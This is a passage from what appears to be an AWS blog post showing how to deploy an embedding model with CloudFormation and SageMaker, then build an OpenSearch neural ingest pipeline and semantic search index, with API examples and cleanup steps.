When you choose Create Stack, you are routed to the AWS CloudFormation console. The CloudFormation template deploys the architecture detailed in the following diagram.

The CloudFormation stack creates an AWS Lambda application that deploys a model from Amazon Simple Storage Service (Amazon S3), creates the connector, and generates the model ID in the output. You can then use this model ID to create a semantic index.

If the default all-MiniLM-L6-v2 model doesn’t serve your purpose, you can deploy any text embedding model of your choice on the chosen model host (SageMaker or Amazon Bedrock) by providing your model artifacts as an accessible S3 object. Alternatively, you can select one of the following pre-trained language models and deploy it to SageMaker. For instructions to set up your endpoint and models, refer to Available Amazon SageMaker Images.

SageMaker is a fully managed service that brings together a broad set of tools to enable high-performance, low-cost ML for any use case, delivering key benefits such as model monitoring, serverless hosting, and workflow automation for continuous training and deployment. SageMaker allows you to host and manage the lifecycle of text embedding models, and use them to power semantic search queries in OpenSearch Service. When connected, SageMaker hosts your models and OpenSearch Service is used to query based on inference results from SageMaker.

View the deployed model through OpenSearch Dashboards

To verify the CloudFormation template successfully deployed the model on the OpenSearch Service domain and get the model ID, you can use the ML Commons REST GET API through OpenSearch Dashboards Dev Tools.

The GET _plugins REST API now provides additional APIs to also view the model status. The following command allows you to see the status of a remote model:

GET _plugins/_ml/models/<modelid>

As shown in the following screenshot, a DEPLOYED status in the response indicates the model is successfully deployed on the OpenSearch Service cluster.

Alternatively, you can view the model deployed on your OpenSearch Service domain using the Machine Learning page of OpenSearch Dashboards.

This page lists the model information and the statuses of all the models deployed.

Create the neural pipeline using the model ID

When the status of the model shows as either DEPLOYED in Dev Tools or green and Responding in OpenSearch Dashboards, you can use the model ID to build your neural ingest pipeline. The following ingest pipeline is run in your domain’s OpenSearch Dashboards Dev Tools. Make sure you replace the model ID with the unique ID generated for the model deployed on your domain.

PUT _ingest/pipeline/neural-pipeline
{
  "description": "Semantic Search for retail product catalog ",
  "processors" : [
    {
      "text_embedding": {
        "model_id": "sfG4zosBIsICJFsINo3X",
        "field_map": {
           "description": "desc_v",
           "name": "name_v"
        }
      }
    }
  ]
}

Create the semantic search index using the neural pipeline as the default pipeline

You can now define your index mapping with the default pipeline configured to use the new neural pipeline you created in the previous step. Ensure the vector fields are declared as knn_vector and the dimensions are appropriate to the model that is deployed on SageMaker. If you have retained the default configuration to deploy the all-MiniLM-L6-v2 model on SageMaker, keep the following settings as is and run the command in Dev Tools.

PUT semantic_demostore
{
  "settings": {
    "index.knn": true,  
    "default_pipeline": "neural-pipeline",
    "number_of_shards": 1,
    "number_of_replicas": 1
  },
  "mappings": {
    "properties": {
      "desc_v": {
        "type": "knn_vector",
        "dimension": 384,
        "method": {
          "name": "hnsw",
          "engine": "nmslib",
          "space_type": "cosinesimil"
        }
      },
      "name_v": {
        "type": "knn_vector",
        "dimension": 384,
        "method": {
          "name": "hnsw",
          "engine": "nmslib",
          "space_type": "cosinesimil"
        }
      },
      "description": {
        "type": "text" 
      },
      "name": {
        "type": "text" 
      } 
    }
  }
}

Ingest sample documents to generate vectors

For this demo, you can ingest the sample retail demostore product catalog to the new semantic_demostore index. Replace the user name, password, and domain endpoint with your domain information and ingest raw data into OpenSearch Service:

curl -XPOST -u 'username:password' 'https://domain-end-point/_bulk' --data-binary @semantic_demostore.json -H 'Content-Type: application/json'

Validate the new semantic_demostore index

Now that you have ingested your dataset to the OpenSearch Service domain, validate if the required vectors are generated using a simple search to fetch all fields. Validate if the fields defined as knn_vectors have the required vectors.

Compare lexical search and semantic search powered by neural search using the Compare Search Results tool

The Compare Search Results tool on OpenSearch Dashboards is available for production workloads. You can navigate to the Compare search results page and compare query results between lexical search and neural search configured to use the model ID generated earlier.

Clean up

You can delete the resources you created following the instructions in this post by deleting the CloudFormation stack. This will delete the Lambda resources and the S3 bucket that contain the model that was deployed to SageMaker. Complete the following steps:

  1. On the AWS CloudFormation console, navigate to your stack details page.
  2. Choose Delete.

  1. Choose Delete to confirm.

You can monitor the stack deletion progress on the AWS CloudFormation console.

Note that, deleting the CloudFormation stack doesn’t delete the model deployed on the SageMaker domain and the AI/ML connector created. This is because these models and the connector can be associated with multiple indexes within the domain. To specifically delete a model and its associated connector, use the model APIs as shown in the following screenshots.

First, undeploy the model from the OpenSearch Service domain memory:

POST /_plugins/_ml/models/<model_id>/_undeploy

Then you can delete the model from the model index:

DELETE /_plugins/_ml/models/<model_id>

Lastly, delete the connector from the connector index:

DELETE /_plugins/_ml/connectors/<connector_id>

Conclusion

In this post, you learned how to deploy a model in SageMaker, create the AI/ML connector using the OpenSearch Service console, and build the neural search index. The ability to configure AI/ML connectors in OpenSearch Service simplifies the vector hydration process by making the integrations to external models native. You can create a neural search index in minutes using the neural ingestion pipeline and the neural search that use the model ID to generate the vector embedding on the fly during ingest and search.

To learn more about these AI/ML connectors, refer to Amazon OpenSearch Service AI connectors for AWS services, AWS CloudFormation template integrations for semantic search, and Creating connectors for third-party ML platforms.


About the Authors

Aruna Govindaraju is an Amazon OpenSearch Specialist Solutions Architect and has worked with many commercial and open source search engines. She is passionate about search, relevancy, and user experience. Her expertise with correlating end-user signals with search engine behavior has helped many customers improve their search experience.

Dagney Braun is a Principal Product Manager at AWS focused on OpenSearch.